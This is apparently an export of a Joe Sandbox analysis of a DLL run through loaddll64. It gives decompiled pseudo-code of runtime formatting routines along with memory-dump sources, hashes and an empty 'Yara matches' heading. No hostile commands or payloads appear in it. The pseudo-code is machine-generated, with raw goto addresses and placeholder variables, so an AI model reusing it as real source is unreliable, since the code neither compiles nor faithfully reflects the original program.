                                                                      				if (_t138 >= 0) goto 0x80026422;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000004;
                                                                      				 *(_t196 + 0x2c) =  ~_t138;
                                                                      				if (1 == 0) goto 0x80026614;
                                                                      				goto 0x8002656a;
                                                                      				if (r8b == 0x20) goto 0x80026477;
                                                                      				if (r8b == 0x23) goto 0x8002646e;
                                                                      				if (r8b == 0x2b) goto 0x80026465;
                                                                      				if (r8b == 0x2d) goto 0x8002645c;
                                                                      				if (r8b != 0x30) goto 0x8002656a;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000008;
                                                                      				goto 0x8002656a;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000004;
                                                                      				goto 0x8002656a;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000001;
                                                                      				goto 0x8002656a;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000020;
                                                                      				goto 0x8002656a;
                                                                      				 *(_t196 + 0x28) =  *(_t196 + 0x28) | 0x00000002;
                                                                      				goto 0x8002656a;
                                                                      				 *(_t196 + 0x28) = _t217;
                                                                      				 *(_t196 + 0x38) = bpl;
                                                                      				 *(_t196 + 0x30) = _t143;
                                                                      				 *((intOrPtr*)(_t196 + 0x34)) = 0;
                                                                      				 *(_t196 + 0x4c) = bpl;
                                                                      				goto 0x8002656a;
                                                                      				 *(_t196 + 0x4c) = bpl;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0x28)) != bpl) goto 0x800264b4;
                                                                      				_t120 = E000000011800338E0( *((intOrPtr*)(_t196 + 0x18)), _t196,  *((intOrPtr*)(_t196 + 8)), _t196 + 0x2c, _t216);
                                                                      				r8b =  *((intOrPtr*)(_t196 + 0x39));
                                                                      				r9b = r8b;
                                                                      				_t165 = _t120 - _t143;
                                                                      				if (_t165 < 0) goto 0x8002652b;
                                                                      				if (_t165 == 0) goto 0x8002652b;
                                                                      				_t206 =  *((intOrPtr*)(_t196 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t206 + 0x10)) !=  *((intOrPtr*)(_t206 + 8))) goto 0x800264f2;
                                                                      				if ( *((intOrPtr*)(_t206 + 0x18)) == bpl) goto 0x800264ed;
                                                                      				 *(_t196 + 0x20) =  *(_t196 + 0x20) + 1;
                                                                      				goto 0x80026510;
                                                                      				 *(_t196 + 0x20) = _t143;
                                                                      				goto 0x80026510;
                                                                      				 *(_t196 + 0x20) =  *(_t196 + 0x20) + 1;
                                                                      				 *((long long*)(_t206 + 0x10)) =  *((long long*)(_t206 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x460)))))) = r8b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t196 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t196 + 0x460)))) + 1;
                                                                      				_t188 =  *((intOrPtr*)(_t196 + 0x10));
                                                                      				r9b =  *_t188;
                                                                      				 *((long long*)(_t196 + 0x10)) = _t188 + 1;
                                                                      				 *((intOrPtr*)(_t196 + 0x39)) = r9b;
                                                                      				if (r9b == 0) goto 0x800265bc;
                                                                      				_t208 =  *((intOrPtr*)(_t196 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t208 + 0x10)) !=  *((intOrPtr*)(_t208 + 8))) goto 0x8002654c;
                                                                      				if ( *((intOrPtr*)(_t208 + 0x18)) == bpl) goto 0x80026547;
                                                                      				 *(_t196 + 0x20) =  *(_t196 + 0x20) + 1;
                                                                      				goto 0x8002656a;
                                                                      				 *(_t196 + 0x20) = _t143;
                                                                      				goto 0x8002656a;
                                                                      				 *(_t196 + 0x20) =  *(_t196 + 0x20) + 1;
                                                                      				 *((long long*)(_t208 + 0x10)) =  *((long long*)(_t208 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x460)))))) = r9b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t196 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t196 + 0x460)))) + 1;
                                                                      				_t193 =  *((intOrPtr*)(_t196 + 0x10));
                                                                      				r8b =  *_t193;
                                                                      				 *((long long*)(_t196 + 0x10)) = _t193 + 1;
                                                                      				r9b = r8b;
                                                                      				 *((intOrPtr*)(_t196 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x80026334;
                                                                      				_t123 =  *(_t196 + 0x24);
                                                                      				if (_t123 == 0) goto 0x80026593;
                                                                      				if (_t123 != 7) goto 0x800265e8;
                                                                      				 *((intOrPtr*)(_t196 + 0x468)) =  *((intOrPtr*)(_t196 + 0x468)) + 1;
                                                                      				if ( *((intOrPtr*)(_t196 + 0x468)) != 2) goto 0x8002630f;
                                                                      				return  *(_t196 + 0x20);
                                                                      			}





























                                                                      0x180026288
                                                                      0x180026288
                                                                      0x180026288
                                                                      0x180026288
                                                                      0x180026288
                                                                      0x180026288
                                                                      0x18002628d
                                                                      0x18002629a
                                                                      0x18002629e
                                                                      0x1800262a3
                                                                      0x1800262ad
                                                                      0x1800262af
                                                                      0x1800262b3
                                                                      0x1800262ba
                                                                      0x1800262c3
                                                                      0x1800262c5
                                                                      0x1800262c9
                                                                      0x1800262cc
                                                                      0x1800262d3
                                                                      0x1800262dc
                                                                      0x1800262e3
                                                                      0x1800262e8
                                                                      0x1800262f0
                                                                      0x1800262f5
                                                                      0x180026302
                                                                      0x18002630f
                                                                      0x180026313
                                                                      0x180026316
                                                                      0x18002631a
                                                                      0x180026320
                                                                      0x180026324
                                                                      0x18002632b
                                                                      0x180026331
                                                                      0x180026337
                                                                      0x18002633d
                                                                      0x180026343
                                                                      0x180026355
                                                                      0x18002636b
                                                                      0x180026370
                                                                      0x180026375
                                                                      0x18002637d
                                                                      0x18002637f
                                                                      0x180026388
                                                                      0x180026391
                                                                      0x18002639a
                                                                      0x18002639f
                                                                      0x1800263a4
                                                                      0x1800263a9
                                                                      0x1800263ae
                                                                      0x1800263b7
                                                                      0x1800263bc
                                                                      0x1800263c1
                                                                      0x1800263c6
                                                                      0x1800263cc
                                                                      0x1800263d5
                                                                      0x1800263da
                                                                      0x1800263dc
                                                                      0x1800263e5
                                                                      0x1800263ea
                                                                      0x1800263ed
                                                                      0x1800263f0
                                                                      0x1800263f2
                                                                      0x1800263f5
                                                                      0x1800263fe
                                                                      0x180026404
                                                                      0x180026406
                                                                      0x18002640f
                                                                      0x180026412
                                                                      0x180026417
                                                                      0x180026419
                                                                      0x18002641f
                                                                      0x180026426
                                                                      0x18002642c
                                                                      0x180026435
                                                                      0x18002643b
                                                                      0x180026441
                                                                      0x180026447
                                                                      0x18002644d
                                                                      0x180026453
                                                                      0x180026457
                                                                      0x18002645c
                                                                      0x180026460
                                                                      0x180026465
                                                                      0x180026469
                                                                      0x18002646e
                                                                      0x180026472
                                                                      0x180026477
                                                                      0x18002647b
                                                                      0x180026480
                                                                      0x180026484
                                                                      0x180026488
                                                                      0x18002648b
                                                                      0x18002648e
                                                                      0x180026492
                                                                      0x18002649b
                                                                      0x1800264a3
                                                                      0x1800264a8
                                                                      0x1800264ad
                                                                      0x1800264b1
                                                                      0x1800264b8
                                                                      0x1800264ba
                                                                      0x1800264cf
                                                                      0x1800264d1
                                                                      0x1800264e0
                                                                      0x1800264e6
                                                                      0x1800264e8
                                                                      0x1800264eb
                                                                      0x1800264ed
                                                                      0x1800264f0
                                                                      0x1800264f2
                                                                      0x1800264f5
                                                                      0x180026503
                                                                      0x18002650d
                                                                      0x180026510
                                                                      0x180026514
                                                                      0x18002651a
                                                                      0x18002651e
                                                                      0x180026525
                                                                      0x18002652b
                                                                      0x18002653a
                                                                      0x180026540
                                                                      0x180026542
                                                                      0x180026545
                                                                      0x180026547
                                                                      0x18002654a
                                                                      0x18002654c
                                                                      0x18002654f
                                                                      0x18002655d
                                                                      0x180026567
                                                                      0x18002656a
                                                                      0x18002656e
                                                                      0x180026574
                                                                      0x180026578
                                                                      0x18002657b
                                                                      0x180026582
                                                                      0x180026588
                                                                      0x18002658d
                                                                      0x180026591
                                                                      0x180026593
                                                                      0x1800265a0
                                                                      0x1800265bb

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65cac433d0b09cd3a4e2713ba3693c78770682f9a28e730f141a2aa864c1d80e
                                                                      • Instruction ID: ae1f7f79d55d5b4fa4a915a00497f0d4edf9f9b8e1953a709ce6db21be07e810
                                                                      • Opcode Fuzzy Hash: 65cac433d0b09cd3a4e2713ba3693c78770682f9a28e730f141a2aa864c1d80e
                                                                      • Instruction Fuzzy Hash: 7AB18172A04B9885E7A7CF29C0543AC3BA4F34DB89F688119EF4A073A9CF35C659C744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E0000000118004067C(void* __rax, long long __rbx, unsigned int* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, intOrPtr _a40, intOrPtr _a48, void* _a64, long long _a80) {
                                                                      				long long _v48;
                                                                      				signed long long _v56;
                                                                      				long long _t37;
                                                                      				long long _t44;
                                                                      				unsigned int* _t49;
                                                                      				void* _t51;
                                                                      				void* _t58;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_t58 = __r8;
                                                                      				_t49 = __rcx;
                                                                      				if (__rdx != 0) goto 0x800406cc;
                                                                      				_t44 = _a80;
                                                                      				_v48 = _t44;
                                                                      				 *((char*)(_t44 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t44 + 0x2c)) = __rdx + 0x16;
                                                                      				_v56 = _v56 & 0x00000000;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				E00000001180013858(__rax, __rbx, _t44, __rdx, __rsi, _t51, __r8);
                                                                      				goto 0x8004093b;
                                                                      				if (_t58 != 0) goto 0x800406ec;
                                                                      				_t37 = _a80;
                                                                      				_v48 = _t37;
                                                                      				 *((char*)(_t37 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t37 + 0x2c)) = 0x16;
                                                                      				goto 0x800406b0;
                                                                      				if (__r9 == 0) goto 0x800406d1;
                                                                      				if (_a40 == 0) goto 0x800406d1;
                                                                      				if (_a48 == 0x41) goto 0x80040717;
                                                                      				if (_t44 - 0x45 - 2 <= 0) goto 0x80040717;
                                                                      				sil = 0;
                                                                      				goto 0x8004071a;
                                                                      				sil = 1;
                                                                      				if (0 != 0) goto 0x80040811;
                                                                      				if ( *_t49 >> 0x34 != 0x7ff) goto 0x80040811;
                                                                      				r8d = 0xc;
                                                                      			}










                                                                      0x18004067c
                                                                      0x180040681
                                                                      0x18004068b
                                                                      0x180040691
                                                                      0x180040697
                                                                      0x180040699
                                                                      0x1800406a4
                                                                      0x1800406a9
                                                                      0x1800406ad
                                                                      0x1800406b0
                                                                      0x1800406b6
                                                                      0x1800406b9
                                                                      0x1800406c0
                                                                      0x1800406c7
                                                                      0x1800406cf
                                                                      0x1800406d1
                                                                      0x1800406de
                                                                      0x1800406e3
                                                                      0x1800406e7
                                                                      0x1800406ea
                                                                      0x1800406ef
                                                                      0x1800406fc
                                                                      0x180040708
                                                                      0x180040710
                                                                      0x180040712
                                                                      0x180040715
                                                                      0x180040717
                                                                      0x180040725
                                                                      0x180040740
                                                                      0x180040753

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2cf1c6814dadc59e4b5e484a6515ffec585909e3e62a6d5aa2bafb27fe1c7b94
                                                                      • Instruction ID: 48af4c86193b3bd39b5eb8d164cd7d00b82aee899546e66f6c21a6cfc5f69dce
                                                                      • Opcode Fuzzy Hash: 2cf1c6814dadc59e4b5e484a6515ffec585909e3e62a6d5aa2bafb27fe1c7b94
                                                                      • Instruction Fuzzy Hash: 6B81F972608B8846EBF5CB1994C039A7A91F38D7D8F25C219FB8957B95DF3CC6488B04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 32639a0ac486f17a790af64588b71752bfeae29b315ec130387c0f9bb313e8ce
                                                                      • Instruction ID: 51b3db3b20b324b9bb66c6fb499feba784b82093afcbb0cba0cd82be7ef40d9d
                                                                      • Opcode Fuzzy Hash: 32639a0ac486f17a790af64588b71752bfeae29b315ec130387c0f9bb313e8ce
                                                                      • Instruction Fuzzy Hash: 56714A7150038C9FEB98CF18D8999DD3BB4FB08358F561329FC8AA6290D778D885CB49
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001C0F4(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t163;
                                                                      				void* _t164;
                                                                      
                                                                      				_t160 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001c1d3;
                                                                      				if (_t110 == 0) goto 0x8001c14d;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001c227;
                                                                      				if (_t111 == 0) goto 0x8001c1a3;
                                                                      				if (_t111 == 0) goto 0x8001c174;
                                                                      				if (_t111 == 0) goto 0x8001c227;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001c1f3;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c250;
                                                                      				E000000011800199C8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c255;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c199;
                                                                      				_t70 = E00000001180017368( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c255;
                                                                      				E00000001180017A10(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001c255;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001c1c9;
                                                                      				_t74 = E00000001180016A80( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c255;
                                                                      				E00000001180016EF8(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001c255;
                                                                      				if (_t115 == 0) goto 0x8001c14d;
                                                                      				if (_t115 == 0) goto 0x8001c14d;
                                                                      				if (_t115 == 0) goto 0x8001c14d;
                                                                      				goto 0x8001c13b;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001c30b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001c249;
                                                                      				_t80 = E00000001180017E80( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001c255;
                                                                      				_t81 = E000000011800182E8(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001c255;
                                                                      				E00000001180019E38(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001c220;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001c26f;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001c309;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001c28d;
                                                                      				if (_t153 >= 0) goto 0x8001c28d;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001c29c;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001c2b3;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E000000011800167C4(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001c2bc;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t164 != _t164) goto 0x8001c2d5;
                                                                      				E00000001180021410(0, _t132, _t154, _t163);
                                                                      				goto 0x8001c2dc;
                                                                      				E0000000118001FE98(__esi, _t132, _t163);
                                                                      				if (0 == 0) goto 0x8001c309;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001c2fa;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001c309;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}























                                                                      0x18001c0f4
                                                                      0x18001c0f4
                                                                      0x18001c0f9
                                                                      0x18001c0fe
                                                                      0x18001c10f
                                                                      0x18001c112
                                                                      0x18001c115
                                                                      0x18001c118
                                                                      0x18001c11e
                                                                      0x18001c121
                                                                      0x18001c127
                                                                      0x18001c129
                                                                      0x18001c12b
                                                                      0x18001c134
                                                                      0x18001c139
                                                                      0x18001c13e
                                                                      0x18001c147
                                                                      0x18001c154
                                                                      0x18001c164
                                                                      0x18001c16a
                                                                      0x18001c16f
                                                                      0x18001c17b
                                                                      0x18001c18d
                                                                      0x18001c18f
                                                                      0x18001c194
                                                                      0x18001c199
                                                                      0x18001c19e
                                                                      0x18001c1aa
                                                                      0x18001c1ba
                                                                      0x18001c1bd
                                                                      0x18001c1bf
                                                                      0x18001c1c4
                                                                      0x18001c1c9
                                                                      0x18001c1ce
                                                                      0x18001c1d6
                                                                      0x18001c1df
                                                                      0x18001c1e8
                                                                      0x18001c1ee
                                                                      0x18001c1f3
                                                                      0x18001c1f7
                                                                      0x18001c1fa
                                                                      0x18001c201
                                                                      0x18001c205
                                                                      0x18001c210
                                                                      0x18001c215
                                                                      0x18001c21b
                                                                      0x18001c222
                                                                      0x18001c22e
                                                                      0x18001c240
                                                                      0x18001c242
                                                                      0x18001c247
                                                                      0x18001c249
                                                                      0x18001c24e
                                                                      0x18001c250
                                                                      0x18001c257
                                                                      0x18001c260
                                                                      0x18001c269
                                                                      0x18001c274
                                                                      0x18001c27d
                                                                      0x18001c282
                                                                      0x18001c284
                                                                      0x18001c287
                                                                      0x18001c28a
                                                                      0x18001c291
                                                                      0x18001c293
                                                                      0x18001c29a
                                                                      0x18001c2a7
                                                                      0x18001c2ae
                                                                      0x18001c2b6
                                                                      0x18001c2b8
                                                                      0x18001c2bc
                                                                      0x18001c2c0
                                                                      0x18001c2c9
                                                                      0x18001c2ce
                                                                      0x18001c2d3
                                                                      0x18001c2d7
                                                                      0x18001c2e4
                                                                      0x18001c2ef
                                                                      0x18001c2f8
                                                                      0x18001c2fa
                                                                      0x18001c303
                                                                      0x18001c306
                                                                      0x18001c323

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05fb3ede8e1ec6b044eac67d4ffc944bfe70253aa37e40454b6e93026fbf674d
                                                                      • Instruction ID: 7f9df21fbc3d95ae1ad3d89745343fffad2632801c14bcc3888baa4ec8f45c10
                                                                      • Opcode Fuzzy Hash: 05fb3ede8e1ec6b044eac67d4ffc944bfe70253aa37e40454b6e93026fbf674d
                                                                      • Instruction Fuzzy Hash: 41518372100E8887EBA69E68C0147ED27A0F74DBDCF158215FA4A4B6D9CF35CA49C74A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001C6FC(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t163;
                                                                      				void* _t164;
                                                                      
                                                                      				_t160 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001c7db;
                                                                      				if (_t110 == 0) goto 0x8001c755;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001c82f;
                                                                      				if (_t111 == 0) goto 0x8001c7ab;
                                                                      				if (_t111 == 0) goto 0x8001c77c;
                                                                      				if (_t111 == 0) goto 0x8001c82f;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001c7fb;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c858;
                                                                      				E00000001180019AD0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c85d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c7a1;
                                                                      				_t70 = E00000001180017474( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c85d;
                                                                      				E00000001180017B18(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001c85d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001c7d1;
                                                                      				_t74 = E00000001180016B8C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c85d;
                                                                      				E00000001180017000(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001c85d;
                                                                      				if (_t115 == 0) goto 0x8001c755;
                                                                      				if (_t115 == 0) goto 0x8001c755;
                                                                      				if (_t115 == 0) goto 0x8001c755;
                                                                      				goto 0x8001c743;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001c913;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001c851;
                                                                      				_t80 = E00000001180017F88( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001c85d;
                                                                      				_t81 = E000000011800183F0(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001c85d;
                                                                      				E00000001180019F40(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001c828;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001c877;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001c911;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001c895;
                                                                      				if (_t153 >= 0) goto 0x8001c895;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001c8a4;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001c8bb;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E000000011800167C4(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001c8c4;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t164 != _t164) goto 0x8001c8dd;
                                                                      				E000000011800215A8(0, _t132, _t154, _t163);
                                                                      				goto 0x8001c8e4;
                                                                      				E00000001180020030(__esi, _t132, _t163);
                                                                      				if (0 == 0) goto 0x8001c911;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001c902;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001c911;
